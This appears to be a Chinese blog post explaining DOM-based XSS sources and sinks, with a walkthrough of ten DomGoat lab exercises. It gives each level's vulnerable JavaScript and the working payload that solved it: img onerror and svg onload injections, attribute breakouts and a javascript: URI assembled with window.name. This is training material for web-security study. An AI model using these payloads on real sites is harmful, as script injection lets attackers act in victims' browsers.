Dom XSS详解与DomGoat靶场writeup

最新推荐文章于 2024-04-02 16:16:00 发布
最新推荐文章于 2024-04-02 16:16:00 发布
阅读量926 收藏 1
点赞数
分类专栏: XSS 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43936524/article/details/114854568
版权

文章目录

Dom XSS概括

Dom Xss指的是js脚本接受用户可控的数据,在客户端浏览器上执行后修改了页面的Dom环境。与一般的XSS不同的是数据不经过服务端的处理,主要由页面的js处理,即可以绕过网站本身的waf。
所以Dom XSS主要聚焦两个方面。

  1. js脚本从何获得数据(Source)
  2. 数据在何处执行(Sink)

下面列举了四种常见的Source和三种Sink环境。

Source

Source指的是危险的数据可能被应用程序获取的位置,危险的数据可能来自于用户的输入然后被传递至执行点,这里列举出主要的四种source。

URL-BASED SOURCES

  • location
  • location.href
  • location.search
  • location.pathname

基于url的数据也是Dom XSS最常见的利用点,经常有页面的跳转使用形如location.hash等方法来获得url中的字段,此时如果未经过滤则可能导致任意跳转的问题。又或者将url中的数据渲染进html文档中又会造成别的问题。

NAVIGATION-BASED SOURCES

  • windows.name
  • document.referrer

COMMUNICATION SOURCES

  • Ajax
  • Web Socket
  • Window Message

STORAGE SOURCES

  • Cookie
  • localStorage
  • SessionStorage

更多的资源见DomGoat Source

Sink

sink指的是sources中的数据得以实际执行而导致Dom Xss的位置

JAVASCRIPT EXECUTION SINKS

  • eval
  • setTimeout
  • setInterval
  • Function

HTML EXECUTION SINKS

  • innerHTML()
  • outerHTML()
  • document.write()

JAVASCRIPT URI SINKS

  • location
  • location.href
  • location.replace()
  • location.assign()

更多的sink详见
Domgoat sinks
jQuery中的sink

DomGoat通关记录

Exercise - 1(location.hash)

let hash = location.hash;
if (hash.length > 1) {
    let hashValueToUse = unescape(hash.substr(1));
    let msg = "Welcome <b>" + hashValueToUse + "</b>!!";
    document.getElementById("msgboard").innerHTML = msg;
}

location.hash获取url#后的字符,且#后的内容用户可控,脚本获得内容后写入html标签中。
payload:

https://domgo.at/cxss/example/1?payload=abcd&sp=x#%3Csvg/onload=alert(1)%3E

Exercise - 2(document.referrer)

let rfr = document.referrer;
let paramValue = unescape(getPayloadParamValueFromUrl(rfr));
if (paramValue.length > 0) {
    let msg = "Welcome <b>" + paramValue + "</b>!!";
    document.getElementById("msgboard").innerHTML = msg;
} else {
    document.getElementById("msgboard").innerHTML = "Parameter named <b>payload</b> was not found in the referrer.";
}

document.referrer获取请求头中referrer字段,可以通过更改Exercise - 1中的参数值来修改referrer字段造成dom xss
payload:
将Exercise - 1参数修改为

https://domgo.at/cxss/example/1?payload=%3Csvg/onload=alert(1)%3E&sp=x#12345

访问Exercise - 2
在这里插入图片描述

Exercise - 3(Ajax)

let responseBody = xhr.responseText;
let responeBodyObject = JSON.parse(responseBody);
let msg = "Welcome <b>" + responeBodyObject.payload + "</b>!!";
document.getElementById("msgboard").innerHTML = msg;

输入payload点击按钮后触发processPayload(),发送一个ajax请求,得到payload内容后写入html标签中
payload:
此处不能使用新建标签 + onload事件来执行代码!!

<img src=x onerror=alert(1)>

Exercise - 4(WebSocket)

let ws = new WebSocket(webSocketUrl);
ws.onmessage = function (evt) {
    let rawMsg = evt.data;
    let msgJson = JSON.parse(rawMsg);
    let msg = "Welcome <b>" + msgJson.payload + "</b>!!";
    document.getElementById("msgboard").innerHTML = msg;
};

采用websocket与服务端交换数据,返回的数据格式为json。
在这里插入图片描述

payload:

<img src=x onerror=alert(1)>

Exercise - 5(postMessage)

window.onmessage = function (evt) {
    let msgObj = evt.data;
    let msg = "Welcome <b>" + msgObj.payload + "</b>!!";
    document.getElementById("msgboard").innerHTML = msg;
};

当前窗口设置message监听,输入payload后调用processPayload函数

window.onload = function () {
	processPayload();
};

let processPayload = function () {
	let payload = document.getElementById('payloadbox').value;
	frames[0].postMessage(payload, location.origin);
};

向当前窗口发送message,内容为输入的payload
payload:

<img src=x onerror=alert(1)>

Exercise - 6(localStorage)

let payloadValue = localStorage.getItem("payload", payload);
let msg = "Welcome " + payload + "!!";
document.getElementById("msgboard").innerHTML = msg;

从localStorage中获得key为payload的参数并写入页面
输入的payload会以{‘payload’:payload}键值对的方式存入localStorage

let processPayload = function () {
    let payload = document.getElementById('payloadbox').value;
    localStorage.setItem("payload", payload);
    readPayload();
};

payload:

<img/src =x onerror=alert(1)>

Exercise - 7(黑名单<>)

let hash = location.hash;
let hashValueToUse = hash.length > 1 ? unescape(hash.substr(1)) : hash;
hashValueToUse = hashValueToUse.replace(/</g, "&lt;").replace(/>/g, "&gt;");
let msg = "<a href='#user=" + hashValueToUse + "'>Welcome</a>!!";
document.getElementById("msgboard").innerHTML = msg;

与第一关的数据处理形式相同,输出的时候对<>进行了实体转义,用’闭合前面的属性值构造新事件来执行脚本
payload:

https://domgo.at/cxss/example/7#' οnclick=alert(1) '

Exercise - 8(黑名单<>)

let hash = location.hash;
let hashValueToUse = hash.length > 1 ? unescape(hash.substr(1)) : hash;

if (hashValueToUse.indexOf("=") > -1 ) {
    hashValueToUse = hashValueToUse.substr(hashValueToUse.indexOf("=")+1);
    hashValueToUse = hashValueToUse.replace(/</g, "&lt;").replace(/>/g, "&gt;");
    let msg = "<a href='#user=" + hashValueToUse + "'>Welcome</a>!!";
    document.getElementById("msgboard").innerHTML = msg;
}

与上关相同,增加了对url中字符串是否有=的判断…
payload:

https://domgo.at/cxss/example/8#user='%20οnclick=alert(1)%20'

Exercise - 9(window.name)

let hash = location.hash;
let hashValueToUse = hash.length > 1 ? unescape(hash.substr(1)) : hash;

if (hashValueToUse.indexOf("=") > -1 ) {
    
    hashValueToUse = hashValueToUse.substr(hashValueToUse.indexOf("=") + 1);
    
    if (hashValueToUse.length > 1) {
        hashValueToUse = hashValueToUse.substr(0, 10);
        hashValueToUse = hashValueToUse.replace(/"/g, "&quot;");
        let windowValueToUse = window.name.replace(/"/g, "&quot;");
        let msg = "<a href=\"" + hashValueToUse + windowValueToUse + "\">Welcome</a>!!";
        document.getElementById("msgboard").innerHTML = msg;
    }
}

获得location.hash字符串与window.name的值拼接在一起,写入html标签中,window.name的值从一个页面到另外一个页面中是不会改变的,故在实际场景中可以自己构造一个恶意页面把window.name设定为恶意代码,访问调用window.name的目标网页即可完成攻击。
payload:
由于本题设置了长度限制,需要设置window.name值为:alert(1)在这里插入图片描述
与url中location.hash的值拼接完成攻击。

https://domgo.at/cxss/example/9#user=javascript

Exercise - 10(location.href)

let urlParts = location.href.split("?");
if (urlParts.length > 1) {
    
    let queryString = urlParts[1];
    let queryParts = queryString.split("&");
    let userId = "";
    for (let i = 0; i < queryParts.length; i++) {
        
        let keyVal = queryParts[i].split("=");
        if (keyVal.length > 1) {
            if (keyVal[0] === "user") {
                
                userId = keyVal[1];
                break;
            }
        }
    }
    if (userId.startsWith("ID-")) {

        userId = userId.substr(3, 10);
        userId = userId.replace(/"/g, "&quot;");
        let windowValueToUse = window.name.replace(/"/g, "&quot;");
        let msg = "<a href=\"" + userId + windowValueToUse + "\">Welcome</a>!!";
        document.getElementById("msgboard").innerHTML = msg;
    }
}

与上关基本相同,利用location.href获取参数值,去除userID的字符串前三位,并限制长度为10与window.name拼接后写入html标签中
payload:

https://domgo.at/cxss/example/10?lang=en&user=ID-javascript&returnurl=/

window.name=":alert(1)"

参考文章:
From 4 sources to 3 sinks in DOM XSS - DomGoat level 1-10 (all levels) writeup
DomGoat

kit_1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DOMXSS
Ethan024的博客
04-23 282
实验环境: 皮卡丘靶场—Cross-Site Scripting—DOMXSS 皮卡丘靶场—Cross-Site Scripting—DOMXSS-X 实验步骤: 输入无害字符串查看情况: 查看源代码: str获取text的值,再拼接到<a>标签里面,再写到dom里面。 确认此处的输入点<input>标签和输出点<div>标签,并且输入和输出的过程中没有做任何转义操作。 对document.getElementById("dom").innerHT
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
domxss靶场注入
weixin_45540609的博客
04-25 303
我们点开靶场的源码发现有关键函数document.write() 我们尝试在url里输入,发现这里可以控制传参 我们输入事件,发现被waf拦截了 换一种方式,使用<iframe onload=alert(/xss/),发现弹窗,说明存在xss漏洞,但是只是一个反射xss。 我们在xsspt上找到一个xss代码,输入代码,发现被waf拦截,这里可以使用navie编码再尝试。(因为document.write支持)在如下网址转化 <sCrIpt srC=//xs..
[ pikachu ] 靶场通关之 XSS (四) --- DOM
qq_51577576的博客
01-15 1823
???? 博主介绍 ????‍???? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步! 一、什么是DOM:(接口) 可以理解为一个访问html的一个标准的接口 Html是由很多的标签组成 在dom
[zkaq靶场]XSS--DOMXSS
wwxxee
05-09 474
DOMxss 知识点 DOM(document object model)文档对象模 一个网页是由dom树构建而成,而js可以修改页面元素,也就是可以修改dom树中的节点。客户端可以通过js动态修改页面内容从而进行xss攻击。 domxss常见函数: document.write():写入网页内容(可以接受native编码) innerHTML:修改节点内容 eval:将字符串当作代码执行 靶场 首页:是一个聊天室 查看页面代码发现此处使用了document.write()。 而页面的url跟文本
Pikachu靶场DOMXSS以及DOMXSS-X
witwitwiter的博客
04-17 3479
Pikachu靶场DOMXSS以及DOMXSS-X 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 要改变页面的某个东西,JavaScript就需要获得对HTML文档中所有元素进行访问的入口。这个入口,连同对HTML元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模来获得的(DOM )。所以,你可以把DOM理解为一个一个访问HTML的标准编程接口。 跨站脚本漏洞测试流程 1.在目标站点上找到输入点,比如查询接口,留言板等; 2.输入一组“特殊字
JQuery Dom XSS探测.html
05-15
可以直接测试网站里面的JQuery本地弹窗xss,属于渗透测试项一部分,此项目在xss中也属于高危,只需要替换里面的带测试链接即可。
sql和xss靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
大流xss详解.txt
07-18
XSS主要分为三种类:存储XSS、反射XSSDOM-based XSS。 - **存储XSS**:攻击者将恶意脚本存储到目标服务器上,然后当其他用户访问这些被污染的页面时,恶意脚本就会被执行。 - **反射XSS**:攻击者通过...
关于XSS靶场详解
sGanYu
08-11 1万+
xss测试链接 Level1 右击查看页面源码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() //这里是显示一条指定消息和一个确认按钮的警告框 { confir..
DVWA靶场通关----(10) XSS(DOM)教程
最新发布
z09364517158的博客
04-02 627
客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM—based XSS漏洞。XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。document.referer属性。
DOMxss深度剖析
weixin_50464560的博客
05-18 431
有人说DOMxss很鸡肋我却不以为然,对于我来说任何漏洞都是有利用价值的。 的确DOMxss不像反射xss和存储xss那样会与后台交互,DOMxss的实现过程都是在前台 介绍两种场景的DOMxss 两种场景都适用的POC #' οnclick="alert(111)"> 或者这个POC #"><img src=@ οnerrοr=alert(1)&g...
XSS技巧拓展】————30、DOM XSS的三种常见案例介绍
Fly_鹏程万里
01-24 1713
在我们的认知中,最常见的XSS(Cross-Site Scripting,跨站点脚本)类是基于源代码的,这意味着注入的JavaScript代码来自服务器端并在客户端执行。 但还有另一种主要类,即基于DOM的类,其中注入的恶意输入不是通过反射或存储方式从服务器发出的:XSS是由本地JavaScript代码在客户端生成的。 基于DOMXSS也有反射和存储子类的功能,非常类似于基于源的...
漏洞篇之DOMxss
weixin_46446401的博客
03-03 8255
介绍了domxss的原理和特点,并讲解了pikachu这个靶场的例子
如何用浏览器进行网站源代码的静态分析—赏金猎人入门手册
热门推荐
一个码农的笔记
12-16 2万+
翻译自:https://medium.com/@_bl4de/how-to-perform-the-static-analysis-of-website-source-code-with-the-browser-the-beginners-bug-d674828c8d9a 翻译:聂心明 在这个手册中,我将展示如何用web浏览器的内置工具去分析客户端的源码。这可能就会有一些奇怪的声音,可能浏览器不是...
过滤器防止xss攻击
yizhousai0662的博客
09-01 1203
将参数中有关xss攻击的非法字符全部处理掉。
xss靶场大通关(持续更新ing)
weixin_30340353的博客
05-08 1407
xss秘籍第一式(常弹) (1)进入自己搭建的靶场,发现有get请求,参数为name,可进行输入,并会将输入的内容显示于网页页面 (2)使用xss的payload进行通关: http://127.0.0.1/xss/level1.php?name=<script>alert(1)</script> ...
WEB 安全测试之 XSS 攻击
weixin_42349891的博客
07-02 596
目录结构1、 背景知识2、 XSS 漏洞的分类3、 XSS 防御4、 如何测试 XSS 漏洞5、 HTML Encode6、 浏览器中的 XSS 过滤器7、 ASP.NET 中的 XSS 安全机制一、 背景知识1、 什么是 XSS 攻击?XSS 攻击: 跨站脚本攻击(Cross Site Scripting) , 为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值